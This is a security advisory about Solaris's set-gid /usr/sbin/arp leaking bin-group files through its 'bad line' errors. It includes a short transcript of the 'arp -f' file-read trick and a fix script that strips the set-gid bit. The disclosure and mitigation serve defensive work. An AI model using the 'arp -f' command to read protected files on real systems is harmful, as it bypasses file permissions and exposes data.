COMMAND

    /usr/sbin/arp

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

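    Brock Tellier found the following.  /usr/sbin/arp is installed
    set-gid bin, and "arp -f <file>" echoes every line it cannot parse
    in a "bad line" error, so it can be used to read bin-owned files
    that the caller cannot open directly.  All testing was done on
    Solaris 2.7 and 2.6 SPARC edition.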

        bash-2.02$ ls -la /etc/bin
        -rw-rw----   1 bin      bin           45 Nov 15 16:44 /etc/bin
        bash-2.02$ cat /etc/bin
        cat: cannot open /etc/bin
        bash-2.02$ /usr/sbin/arp -f /etc/bin
        arp: bad line: seekret1

        arp: bad line: seekret2

        arp: bad line: seekret3

        arp: bad line: seekret4

        arp: bad line: seekret5

        bash-2.02$

    Larry W. Cashdollar confirmed it on 2.5.1.

SOLUTION

    You can safely remove the set-gid bin bit from arp.  There is no
    need for it to be suid in any case.
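
    One way to apply and verify the fix above, as an added example that
    is not part of the original advisory.  The helper names strip_setgid
    and list_setgid are hypothetical; the script assumes it is run as
    root or as the owner of the file.

```shell
#!/bin/sh
# Added example, not part of the advisory. strip_setgid and list_setgid
# are hypothetical helper names. Run as root (or as the file's owner).

# strip_setgid FILE
#   0  set-gid bit was set and has been removed
#   1  set-gid bit was not set, nothing changed
#   2  FILE is not a regular file, or the bit could not be removed
strip_setgid() {
    f=$1
    [ -f "$f" ] || { echo "$f: not a regular file" >&2; return 2; }
    if [ ! -g "$f" ]; then
        echo "$f: set-gid bit not set"
        return 1
    fi
    ls -l "$f"                      # mode before the change
    chmod g-s "$f" || return 2
    # Re-test the bit instead of trusting chmod's exit status alone.
    if [ -g "$f" ]; then
        echo "$f: set-gid bit still set" >&2
        return 2
    fi
    ls -l "$f"                      # mode after the change
    return 0
}

# list_setgid DIR: print regular files under DIR that carry the set-gid
# bit, for a re-check after the change.
list_setgid() {
    find "$1" -type f -perm -2000 -print
}

# Usage: sh thisfile /usr/sbin/arp   (path taken from the advisory)
if [ "$#" -gt 0 ]; then
    for target in "$@"; do
        strip_setgid "$target" || :
    done
fi
```

    After the change, the "arp -f /etc/bin" command from the transcript
    should fail to open the file for an unprivileged user.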